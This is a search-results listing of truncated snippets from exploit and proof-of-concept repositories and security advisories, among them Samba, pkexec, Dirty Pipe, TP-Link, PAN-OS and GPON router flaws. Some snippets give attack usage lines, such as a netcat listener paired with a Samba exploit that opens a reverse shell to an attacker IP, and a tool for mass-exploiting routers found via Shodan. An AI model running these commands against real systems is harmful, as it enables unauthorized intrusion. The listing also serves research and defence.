784834 matches found
CVE-2024-54887-PoC
CVE-2024-54887 TypeScript PoC This repository contains a TypeScript ts-node rewrite of the public Python PoC for CVE-2024-54887 TP-Link TL-WR940N v3/v4 authenticated RCE. Prerequisites Node.js 20+ Install root@kitploit: npm install Usage root@kitploit: npx ts-node .\cve-2024-54887.ts --ip Optiona...
CVE-2007-2447
CVE-2007-2447 Samba 3.0.20 CVE-2007-2447 Exploit root@kitploit: python3 smb3.0.20exp.py -lh localhost -lp local port -t target Create a Netcat listener root@kitploit: nc -nlvp 4444 Run the script root@kitploit: python3 smb3.0.20exp.py -lh 10.10.16.18 -lp 4444 -t 10.10.10.3...
CVE-2022-0847
CVE-2022-0847 Dirty Pipe Linux Kernel Privilege Escalation Analysis toc This article was first published on Huawei Security's official account, this is the blog version more complete First published link: https://mp.weixin.qq.com/s/6VhWBOzJ7uu80nzFxe5jpg Vulnerability Introduction Vulnerability I...
CVE-2024-3400
CVE-2024-3400 CVE-2024-3400 PAN-OS: Vulnerabilidad de Inyección de Comandos del SO en GlobalProtect El Pan-OS Checker se utiliza para determinar la versión del software Palo Alto PAN-OS de un portal o interfaz de gestión GlobalProtect remoto. Antes de ejecutar el script, asegúrese de que...
cve-2016-20012
CVE-2016-20012 SSH Username Enumeration Script This Python script attempts to enumerate valid usernames on an SSH server by trying to connect with an invalid password. It measures the response time for each username to identify possible valid accounts based on server behavior. Table of Contents...
CVE-2024-24549
Prueba de Concepto PoC para la Vulnerabilidad de Denegación de Servicio DoS en Apache Tomcat Este repositorio contiene un script de Prueba de Concepto PoC que demuestra una vulnerabilidad de Denegación de Servicio DoS en Apache Tomcat. La vulnerabilidad surge de una validación incorrecta de las...
CVE-2025-57310
CVE-2025-57310 A Cross-Site Request Forgery CSRF vulnerability in Salmen2/Simple-Faucet-Script v1.07 via crafted POST request to admin.php?p=ads&c=1 allowing attackers to execute arbitrary code. CWE CWE-352: Cross-Site Request Forgery CSRF CVSS v3.1 Base Score: 8.8 High root@kitploit:...
CVE-2024-27956-RCE-File-Package
CVE-2024-27956-RCE File Package Contents: 1. exploit.py Original Creator:https://GitHub.com/diego-tella 2. modifiedexploit.py Modified with an ignore ssl verification option 3. Screenshot 4. wpValvePressplugin.py Python script using URI parameters to search for vulnerable wp plugin...
cve-2021-1675-printnightmare
================================================================================= Simple policy to detect CVE-2021-1675 Following functionality are provided by the script :: This zeek package Utilizes pcap and work of : https://github.com/LaresLLC/CVE-2021-1675.git root@kitploit: builds upon the...
salt-shellshock
shellshock actualización de bash Esta receta intenta actualizar bash desde el paquete del SO, y recurre a compilar bash en sistemas sin actualización disponible. Funciona para nosotros en ubuntu/debian antiguos. Script de instalación de bash desde:...
Important: Red Hat Security Advisory: valkey security, bug fix, and enhancement update
An update for valkey is now available for Red Hat Enterprise Linux 10. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System CVSS base score, which gives a detailed severity rating, is available for each vulnerability from t...
net/mail: golang: net/mail: Denial of Service via pathological email address parsing
A flaw was found in the net/mail package within the Go standard library. A remote attacker could provide specially crafted, pathological email addresses. When these malformed email addresses are parsed by the consumePhrase function, it can lead to excessive resource consumption due to quadratic...
crauEmu
Mascot designed by@kottsarapkin crauEmu is an uEmu extension for developing and analyzing payloads for code-reuse attacks. Slides from ZeroNights 2019 Demo 1 - X32-64, Edge, rop-gadgets from pwnjs Demo 2 - ARM64, checkm8 callback-chain RopEditor Installation 1. Put the file crauEmu.py in same...
CVE-2021-4034
CVE-2021-4034 pkexec El uso de este script en python aprovecha la vulnerabilidad en el archivo pkexec para ganar acceso a root sin proporcionar credenciales · Detecta si el binario tiene los privilegios SUID, en este caso es vulnerable root@kitploit: usuario@gatogamer $ ls -la /usr/bin/pkexec...
external_expat_AOSP10_r33_CVE-2022-22822toCVE-2022-22827
Expat, Release 2.2.6 This is Expat, a C library for parsing XML, started by James Clark in 1997. Expat is a stream-oriented XML parser. This means that you register handlers with the parser before starting the parse. These handlers are called when the parser discovers the associated structures in...
CVE-2019-1010174
CVE-2019-1010174 CImg Library v.2.3.3 - command injection CVE-2019-1010174 Detail Modified This vulnerability has been modified since it was last analyzed by the NVD. It is awaiting reanalysis which may result in further changes to the information provided. Description CImg The CImg Library v.2.3...
Pingpon-Exploit
PINGPON EXPLOIT Autor: @037 Pingpon es una herramienta utilizada para obtener miles de routers domésticos GPON vulnerables usando Shodan.io para luego ejecutar cualquier comando de Linux aprovechando una falla de ejecución remota de código CVE-2018-10562. DESCARGO DE RESPONSABILIDAD NO soy...
CVE-2022-24638
VISTO EN EXPLOITDB: https://www.exploit-db.com/exploits/51026 ESTA VERSIÓN ESTÁ CORREGIDA PARA EVITAR FALSOS NEGATIVOS CVE-2022-24637 Exploit para el RCE no autenticado en Open Web Analytics OWA 1.7.4. Este trabajo se basa en https://devel0pment.de/?p=2494. DESCARGO DE RESPONSABILIDAD: Este scrip...
CVE-2023-23752
CVE-2023-23752 Joomla! v4.2.8 - Divulgación de información no autenticada Para ejecutar este script, necesitamos instalar algunas gemas faltantes: root@kitploit: sudo gem install httpx sudo gem install docopt sudo gem install paint root@kitploit: ruby exploit.rb http://dev.devvortex.htb...
rustbuster
rustbuster Un completo fuzzer web y herramienta de descubrimiento de contenido Introducción Lee el artículo del blog: Presentando Rustbuster — Un completo fuzzer web y herramienta de descubrimiento de contenido Descarga Puedes descargar binarios precompilados desde aquí. Instalación root@kitploit...